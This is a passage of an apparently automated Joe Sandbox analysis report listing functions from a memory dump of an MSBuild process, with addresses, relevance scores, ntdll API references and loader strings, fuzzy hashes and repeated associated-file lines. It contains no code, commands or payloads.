Associated: 00000009.00000002.2120338744.00000000019A3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.00000000019A9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1880000_MSBuild.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
String ID:
API String ID: 1404860816-0
Opcode ID: 061736ee9a8e62c7b2ad3135fe89743660b2121f4b5c20d5e111840e0edf4fa6
Instruction ID: 9a712fcaffe44a6e8dca300a578f35bdf1714ab2e615bb823c82e8cd9b89feaf
Opcode Fuzzy Hash: 061736ee9a8e62c7b2ad3135fe89743660b2121f4b5c20d5e111840e0edf4fa6
Instruction Fuzzy Hash: 82424A75900715DFDB21CF28C880BAAB7F5BF44314F1445ADEA89EB246E770AA84CF61

Function 018DEF28 Relevance: 6.3, APIs: 4, Instructions: 347COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2120338744.00000000018A6000.00000040.00001000.00020000.00000000.sdmp, Offset: 01880000, based on PE: true

Associated: 00000009.00000002.2120338744.0000000001880000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001887000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001900000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001906000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001942000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.00000000019A3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.00000000019A9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1880000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8b6c769f92fb58940dc545effbd3ce716376dbe64de3c1a8e3ca3f82880d404f
Instruction ID: 9f7182924d9ad5bb49bd892e2649f7dda6eaf2006e7276453a5944c889bb97f6
Opcode Fuzzy Hash: 8b6c769f92fb58940dc545effbd3ce716376dbe64de3c1a8e3ca3f82880d404f
Instruction Fuzzy Hash: 2AE1FE71D00708DFCB26CFA9C980A9DBBF5BF48314F24456AE646E7261D770AA82DF50

Function 018BEA80 Relevance: 6.1, Strings: 4, Instructions: 1073COMMON

Download Yara Rule

Strings

, xrefs: 018BF299
R, xrefs: 018BEB62
T, xrefs: 018BEB4E
{, xrefs: 01914643

Memory Dump Source

Source File: 00000009.00000002.2120338744.00000000018A6000.00000040.00001000.00020000.00000000.sdmp, Offset: 01880000, based on PE: true

Associated: 00000009.00000002.2120338744.0000000001880000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001887000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001900000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001906000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001942000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.00000000019A3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.00000000019A9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1880000_MSBuild.jbxd

Similarity

API ID:
String ID: $R$T${
API String ID: 0-4276472446
Opcode ID: 63b6e5869590ff3141bf0666597d18bd2376909f8f84126c2f9b9aee89eb3d78
Instruction ID: 463b7181bee24691854be12b674c65c701b8bc967a2bc364d04d7dd62bd56473
Opcode Fuzzy Hash: 63b6e5869590ff3141bf0666597d18bd2376909f8f84126c2f9b9aee89eb3d78
Instruction Fuzzy Hash: C5A22474A0562A8FDB65CF19CD88BA9BBB5AB49704F1442E9D90DE7394DB309EC1CF00

Function 018E4C59 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 164COMMON

Download Yara Rule

Strings

0, xrefs: 018E4CC3
Flst, xrefs: 018E4C96

Memory Dump Source

Source File: 00000009.00000002.2120338744.00000000018A6000.00000040.00001000.00020000.00000000.sdmp, Offset: 01880000, based on PE: true

Associated: 00000009.00000002.2120338744.0000000001880000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001887000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001900000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001906000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001942000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.00000000019A3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.00000000019A9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1880000_MSBuild.jbxd

Similarity

API ID:
String ID: 0$Flst
API String ID: 0-758220159
Opcode ID: 30e821018b747db520fe67093ec2d921c07d3a1b1386fd58868958b19b458519
Instruction ID: b3d195cb8f7d215d4b477a8d8f13f1df57c0ccc1421fefc73af1c0f0e694c7ac
Opcode Fuzzy Hash: 30e821018b747db520fe67093ec2d921c07d3a1b1386fd58868958b19b458519
Instruction Fuzzy Hash: AA517BB1E012188BDF26CF99C488669FBF5FF46718F14802AD04DDB256E7759A45CB80

Function 018CAD00 Relevance: 4.3, Strings: 3, Instructions: 509COMMON

Download Yara Rule

Strings

DLL search path passed in externally: %ws, xrefs: 019180A6
minkernel\ntdll\ldrutil.c, xrefs: 019180B7
LdrpInitializeDllPath, xrefs: 019180AD

Memory Dump Source

Source File: 00000009.00000002.2120338744.00000000018A6000.00000040.00001000.00020000.00000000.sdmp, Offset: 01880000, based on PE: true

Associated: 00000009.00000002.2120338744.0000000001880000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001887000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001900000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001906000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001942000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.00000000019A3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.00000000019A9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1880000_MSBuild.jbxd

Similarity

API ID:
String ID: DLL search path passed in externally: %ws$LdrpInitializeDllPath$minkernel\ntdll\ldrutil.c
API String ID: 0-109579469
Opcode ID: 479b27ea249ca9969ff3c9a0274726553145ed211df75b1010a12f9504de2001
Instruction ID: e9cbf64a0ae851c042d672d73d23d9ef101fe23e5b5987f8b90b9a5743fed42d
Opcode Fuzzy Hash: 479b27ea249ca9969ff3c9a0274726553145ed211df75b1010a12f9504de2001
Instruction Fuzzy Hash: 9D12F67160834A8FD325DF28C481BAAB7E5BFC4B54F48091DF989DB291E734DA44CB92

Function 018D6962 Relevance: 4.0, Strings: 2, Instructions: 1492COMMON

Download Yara Rule

Strings

@, xrefs: 018D6C24
, xrefs: 0191CA51

Memory Dump Source

Source File: 00000009.00000002.2120338744.00000000018A6000.00000040.00001000.00020000.00000000.sdmp, Offset: 01880000, based on PE: true

Associated: 00000009.00000002.2120338744.0000000001880000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001887000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001900000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001906000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001942000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.00000000019A3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.00000000019A9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1880000_MSBuild.jbxd

Similarity

API ID: InitializeThunk
String ID: $@
API String ID: 2994545307-1077428164
Opcode ID: b2cfa7cf2e446896ca2eaa67068e777f767b901592927d4d08866dcae5b7f52d
Instruction ID: 400799150370c189305bc00ad4f96865833cac4ba630d623a0811bf951bb8bb5
Opcode Fuzzy Hash: b2cfa7cf2e446896ca2eaa67068e777f767b901592927d4d08866dcae5b7f52d
Instruction Fuzzy Hash: 16C290716083459FEB25CF28C881BABBBE5BF88758F04892DF989C7241E734D945CB52

Function 018B04E5 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 153timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 018B055E

Strings

kLsE, xrefs: 018B0540

Memory Dump Source

Source File: 00000009.00000002.2120338744.00000000018A6000.00000040.00001000.00020000.00000000.sdmp, Offset: 01880000, based on PE: true

Associated: 00000009.00000002.2120338744.0000000001880000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001887000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001900000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001906000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001942000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.00000000019A3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.00000000019A9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1880000_MSBuild.jbxd

Similarity

API ID: DebugPrintTimes
String ID: kLsE
API String ID: 3446177414-3058123920
Opcode ID: 108899d862decac9712790c4d7199a8de29d3a98990e140d5ca338b67abd5d1d
Instruction ID: 6df1f5d946d592292f6a079863906dff593c38c5518077d8bef17f5ae06a0187
Opcode Fuzzy Hash: 108899d862decac9712790c4d7199a8de29d3a98990e140d5ca338b67abd5d1d
Instruction Fuzzy Hash: 705188715047468BD724EF68C4806E7BBF4AF85304F10883EFAAAC7741E770A645CB92

Function 01932349 Relevance: 3.6, Strings: 2, Instructions: 1117COMMON

Download Yara Rule

Strings

@, xrefs: 01932B74
@, xrefs: 01932942

Memory Dump Source

Source File: 00000009.00000002.2120338744.0000000001906000.00000040.00001000.00020000.00000000.sdmp, Offset: 01880000, based on PE: true

Associated: 00000009.00000002.2120338744.0000000001880000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001887000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.00000000018A6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001900000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001942000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.00000000019A3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.00000000019A9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1880000_MSBuild.jbxd

Similarity

API ID:
String ID: @$@
API String ID: 0-149943524
Opcode ID: 841783f31e926fcdf0a9022b8c38112579806b7c0d82b2aaffc8641dfa244960
Instruction ID: 10c06884f1a3be728783fa0b7401be4f18bde6189dfc57689aae3d27989ac797
Opcode Fuzzy Hash: 841783f31e926fcdf0a9022b8c38112579806b7c0d82b2aaffc8641dfa244960
Instruction Fuzzy Hash: 18927B71608342ABE721CF28C884F6BBBE9BBC4754F14492DFA99D7250D770E944CB92

Function 018E4D1D Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 117timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 018E4D64

Strings

minkernel\ntdll\ldrsnap.c, xrefs: 01923640, 0192366C

Memory Dump Source

Source File: 00000009.00000002.2120338744.00000000018A6000.00000040.00001000.00020000.00000000.sdmp, Offset: 01880000, based on PE: true

Associated: 00000009.00000002.2120338744.0000000001880000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001887000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001900000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001906000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001942000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.00000000019A3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.00000000019A9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1880000_MSBuild.jbxd

Similarity

API ID: DebugPrintTimes
String ID: minkernel\ntdll\ldrsnap.c
API String ID: 3446177414-3711822496
Opcode ID: 3104423ea4ffa9193d1503dc940fc4c4cd978c7dd75d8e296dedc16f50813823
Instruction ID: f157532a03bd607f57ebe7275e0561be0ae92fcb4820f5ebc8c832e19fea1ce1
Opcode Fuzzy Hash: 3104423ea4ffa9193d1503dc940fc4c4cd978c7dd75d8e296dedc16f50813823
Instruction Fuzzy Hash: EF311922B00215EAEF32AA1CC88DB7576F4BB43754F0A402AEA0CD7651D7A69F8487D5

Function 018F4F03 Relevance: 3.0, APIs: 2, Instructions: 28timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 018F4F1F
RtlDebugPrintTimes.NTDLL ref: 018F4F55

Memory Dump Source

Source File: 00000009.00000002.2120338744.00000000018A6000.00000040.00001000.00020000.00000000.sdmp, Offset: 01880000, based on PE: true

Associated: 00000009.00000002.2120338744.0000000001880000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001887000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001900000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001906000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001942000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.00000000019A3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.00000000019A9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1880000_MSBuild.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: b125008db0451134235fcf1c12a04f1db71b85c14f0f7beec0353bbf90a6f006
Instruction ID: 1d6ad02e0ab5b4b51591cf45e467bf1f26d354afcc3ae289581a1e29a56e533d
Opcode Fuzzy Hash: b125008db0451134235fcf1c12a04f1db71b85c14f0f7beec0353bbf90a6f006
Instruction Fuzzy Hash: 38F03A71548A81CFD329DF14E549B6A73E5FF84704F44483EE90AC7A90D734AE08CBA2

Function 018E2CF0 Relevance: 2.7, Strings: 2, Instructions: 218COMMON

Download Yara Rule

Strings

.Local\, xrefs: 018E2D91
@, xrefs: 018E2E4D

Memory Dump Source

Source File: 00000009.00000002.2120338744.00000000018A6000.00000040.00001000.00020000.00000000.sdmp, Offset: 01880000, based on PE: true

Associated: 00000009.00000002.2120338744.0000000001880000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001887000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001900000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001906000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001942000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.00000000019A3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.00000000019A9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1880000_MSBuild.jbxd

Similarity

API ID:
String ID: .Local\$@
API String ID: 0-380025441
Opcode ID: e025a3be4f52ba6586028876c6bcfa48fcf5ccdefddef865e6edc1a3f660e1fb
Instruction ID: 8f25def7d5b32adb9e74cc6d03f78daa8178ceee0ff40409611050594e0ec406
Opcode Fuzzy Hash: e025a3be4f52ba6586028876c6bcfa48fcf5ccdefddef865e6edc1a3f660e1fb
Instruction Fuzzy Hash: 508100716083069FDB21DF18C484A6BBBE9BF86704F04895DFA84CB345D371DA04CBA2

Function 018B6A50 Relevance: 2.0, APIs: 1, Instructions: 548COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2120338744.00000000018A6000.00000040.00001000.00020000.00000000.sdmp, Offset: 01880000, based on PE: true

Associated: 00000009.00000002.2120338744.0000000001880000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001887000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001900000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001906000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001942000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.00000000019A3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.00000000019A9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1880000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2571d3e907a609626746321e1d770c06a714928f4618e245e983032e32a86f9f
Instruction ID: 3d8c18d6635bdc49cfe9a4bc750a868d7535e0ac3549378efa924a966ba1864f
Opcode Fuzzy Hash: 2571d3e907a609626746321e1d770c06a714928f4618e245e983032e32a86f9f
Instruction Fuzzy Hash: 79329C71A04209DFDB25CF68C480BAABBF5FF48304F244569EA5AEB395E734E941CB50

Function 018C0770 Relevance: 1.9, APIs: 1, Instructions: 414COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2120338744.00000000018A6000.00000040.00001000.00020000.00000000.sdmp, Offset: 01880000, based on PE: true

Associated: 00000009.00000002.2120338744.0000000001880000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001887000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001900000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001906000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001942000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.00000000019A3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.00000000019A9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1880000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a6a0be0f519de2bac80b8388fd91e2df577cd38b8bacffa48a5d566e3900727e
Instruction ID: 1e96a8585a306cce4ddfb780fbeeb4e7f09983ac107d6bb71a717fadae471dbd
Opcode Fuzzy Hash: a6a0be0f519de2bac80b8388fd91e2df577cd38b8bacffa48a5d566e3900727e
Instruction Fuzzy Hash: 45F1CF3460060ADFEB15CF68C880BAAB7B5FF85B44F15816CE51ADB345D734EA81CB91

Function 018BCC74 Relevance: 1.9, Strings: 1, Instructions: 607COMMON

Download Yara Rule

Strings

9, xrefs: 018BCBA1

Memory Dump Source

Source File: 00000009.00000002.2120338744.00000000018A6000.00000040.00001000.00020000.00000000.sdmp, Offset: 01880000, based on PE: true

Associated: 00000009.00000002.2120338744.0000000001880000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001887000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001900000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001906000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001942000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.00000000019A3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.00000000019A9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1880000_MSBuild.jbxd

Similarity

API ID:
String ID: 9
API String ID: 0-2473173378
Opcode ID: 95f66602651b09e59c4de613501f072ca6a364262526f92888d5248d56882f14
Instruction ID: 3880761747f9bdb8d1adc607707395b396843dc6056df51e2c20ea1a44dd5d57
Opcode Fuzzy Hash: 95f66602651b09e59c4de613501f072ca6a364262526f92888d5248d56882f14
Instruction Fuzzy Hash: 34422875E002199BDB25CFA9C8C0BEDBBB1BF48354F148269E919EB351D734AE81CB50

Function 018DE5E7 Relevance: 1.8, APIs: 1, Instructions: 278COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2120338744.00000000018A6000.00000040.00001000.00020000.00000000.sdmp, Offset: 01880000, based on PE: true

Associated: 00000009.00000002.2120338744.0000000001880000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001887000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001900000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001906000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001942000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.00000000019A3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.00000000019A9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1880000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c73f153bc119ea8de8f589420464047db24d5b8282ff9a97a3091e63b422ca7c
Instruction ID: 3c1dd961cf7536aec25b56b271efa2799567c1efbc9ad36b160b0075b8dea3cf
Opcode Fuzzy Hash: c73f153bc119ea8de8f589420464047db24d5b8282ff9a97a3091e63b422ca7c
Instruction Fuzzy Hash: C1A11431E0471D9FEB22DB9CC844BAEBBA8BF00714F050125EA15EB295D7789E85CBD1

Function 018ECDB1 Relevance: 1.7, APIs: 1, Instructions: 197timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 018ECE7D

Memory Dump Source

Source File: 00000009.00000002.2120338744.00000000018A6000.00000040.00001000.00020000.00000000.sdmp, Offset: 01880000, based on PE: true

Associated: 00000009.00000002.2120338744.0000000001880000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001887000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001900000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001906000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001942000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.00000000019A3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.00000000019A9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1880000_MSBuild.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: 42a76836a63c79e45c4557a0dc153b6d0ea15afe386d838fd47f7fa1349cca31
Instruction ID: c7eac137782474462f7a882bfa342cf9897817d89df62f45eb54cccf91adf389
Opcode Fuzzy Hash: 42a76836a63c79e45c4557a0dc153b6d0ea15afe386d838fd47f7fa1349cca31
Instruction Fuzzy Hash: 6361EF71E002169FCB19DF6CC884AAEB7F9FF09314F108169E616EB295DB31DA01CB90

Function 018C03E9 Relevance: 1.7, APIs: 1, Instructions: 184COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 01914D8A

Memory Dump Source

Source File: 00000009.00000002.2120338744.00000000018A6000.00000040.00001000.00020000.00000000.sdmp, Offset: 01880000, based on PE: true

Associated: 00000009.00000002.2120338744.0000000001880000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001887000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001900000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001906000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001942000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.00000000019A3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.00000000019A9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1880000_MSBuild.jbxd

Similarity

API ID: ___swprintf_l
String ID:
API String ID: 48624451-0
Opcode ID: f081a71e3cb47a0b8f4d172c5a0efbbf9d55e179da77c93854dc81fad38d202b
Instruction ID: 31b20ca472e0c6473e451037e185c2117440968cc8dd8e4bb81866c3e7e6d971
Opcode Fuzzy Hash: f081a71e3cb47a0b8f4d172c5a0efbbf9d55e179da77c93854dc81fad38d202b
Instruction Fuzzy Hash: 3D714B71A0014A9FDB05DFA8C990BAEBBF8FF58744F144069E905E7251EB34EE41CBA1

Function 018E29F9 Relevance: 1.7, Strings: 1, Instructions: 411COMMON

Download Yara Rule

Strings

@, xrefs: 0192259B

Memory Dump Source

Source File: 00000009.00000002.2120338744.00000000018A6000.00000040.00001000.00020000.00000000.sdmp, Offset: 01880000, based on PE: true

Associated: 00000009.00000002.2120338744.0000000001880000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001887000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001900000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001906000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001942000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.00000000019A3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.00000000019A9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1880000_MSBuild.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 61945e72eeff74b2a74037840b4ffa68cb92460ca2e4c99aee56e2f76a3696c3
Instruction ID: 51de65274354a0628e65d91d279b81be5c33ecc0b0cc7176d62a6561d402b6df
Opcode Fuzzy Hash: 61945e72eeff74b2a74037840b4ffa68cb92460ca2e4c99aee56e2f76a3696c3
Instruction Fuzzy Hash: 48027EB1D002299BDB31DB58CC84B9AB7B9AB55704F4041DAE60DE7241EB30AF94CF59

Function 018B2FC8 Relevance: 1.7, Strings: 1, Instructions: 410COMMON

Download Yara Rule

Strings

PATH, xrefs: 018B30D6, 018B3124

Memory Dump Source

Source File: 00000009.00000002.2120338744.00000000018A6000.00000040.00001000.00020000.00000000.sdmp, Offset: 01880000, based on PE: true

Associated: 00000009.00000002.2120338744.0000000001880000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001887000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001900000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001906000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001942000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.00000000019A3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.00000000019A9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1880000_MSBuild.jbxd

Similarity

API ID:
String ID: PATH
API String ID: 0-1036084923
Opcode ID: c3d1e37559e26a294816343bc696cc354fc4ae8be46a95b3df40500568464884
Instruction ID: 080ba9fb60c44e19723050bb61d4848414ec42d2d178f12728a1047708682091
Opcode Fuzzy Hash: c3d1e37559e26a294816343bc696cc354fc4ae8be46a95b3df40500568464884
Instruction Fuzzy Hash: BBF19E71A00619DBDB25CF9CD8C0AEEBBB5FF48700F894029E945EB354D734AA45CBA1

Function 018D0C44 Relevance: 1.7, APIs: 1, Instructions: 152timeCOMMON

Download Yara Rule

APIs

